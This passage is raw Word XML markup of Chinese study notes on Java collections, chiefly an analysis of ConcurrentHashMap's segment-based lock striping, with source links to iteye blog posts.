          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>根据链表中元素的顺序可以分为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>按插入顺序的链表，和按访问顺序</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的链表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F546D" w:rsidRPr="00F41A4C" w:rsidRDefault="009F546D" w:rsidP="009F546D">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F546D" w:rsidRPr="00F41A4C" w:rsidRDefault="009F546D" w:rsidP="009F546D">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>资料</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0022320A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://boy00fly.iteye.com/blog/1144691  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F546D" w:rsidRPr="00F41A4C" w:rsidRDefault="009F546D" w:rsidP="009F546D">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">      http://zhangshixi.iteye.com/blog/673789</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F546D" w:rsidRPr="003E0B29" w:rsidRDefault="009F546D" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00803295" w:rsidRDefault="007459DB" w:rsidP="00803295">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidR="00003C0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00803295" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000B1DEC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidR="00803295" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>源码分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7236F" w:rsidRPr="00A7236F" w:rsidRDefault="00003C0C" w:rsidP="00A7236F">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.4</w:t>
      </w:r>
      <w:r w:rsidR="00A7236F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00A604D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A604D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源码分析</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ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Java 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中支持高并发、高吞吐量的线程安全</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>实现。在这之前我对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>只有一些肤浅的理解，仅知道它采用了多个锁，大概也足够了。但是在经过一次惨痛的面试经历之后，我觉得必须深入研究它的实现。面试中被问到读是否要加锁，因为读写会发生冲突，我说必须要加锁，我和面试官也因此发生了冲突，结果可想而知。还是闲话少说，通过仔细阅读源代码，现在总算理解</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>实现机制了，其实现之精巧，令人叹服，与大家共享之。</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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实现原理</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>锁分离</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Lock Stripping)</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ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>允许多个修改操作并发进行，其关键在于使用了锁分离技术。它使用了多个锁来控制对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>表的不同部分进行的修改。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>内部使用段</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(Segment)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>来表示这些不同的部分，每个段其实就是一个小的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，它们有自己的锁。只要多个修改操作发生在不同的段上，它们就可以并发进行。</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3E2D91" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="003E2D91">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有些方法需要跨段，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>containsValue()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，它们可能需要锁定整个表而而不仅仅是某个段，这需要按顺序锁定所有段，操作完毕后，又按顺序释放所有段的锁。这里</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>按顺序</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是很重要的，否则极有可能出现死锁，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>内部，段数组是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的，并且其成员变量实际上也是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的，但是，仅仅是将数组声明为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的并不保证数组成员也是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的，这需要实现上的保证。这可以确保不会出现死锁，因为获得锁的顺序是固定的。不变性是多线程编程占有很重要的地位，下面还要谈到</w:t>
      </w:r>
      <w:r w:rsidR="003E2D91" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="003E2D91">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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="146685" cy="137795"/>
            <wp:effectExtent l="19050" t="0" r="5715" b="0"/>
            <wp:docPr id="15" name="图片 1" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="146685" cy="137795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/**</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3"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> * The segments, each of which is a specialized hash table</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3"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> */</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3"/>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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> Segment&lt;K,V&gt;[] segments;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00573A3A">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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lastRenderedPageBreak/>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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>不变</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
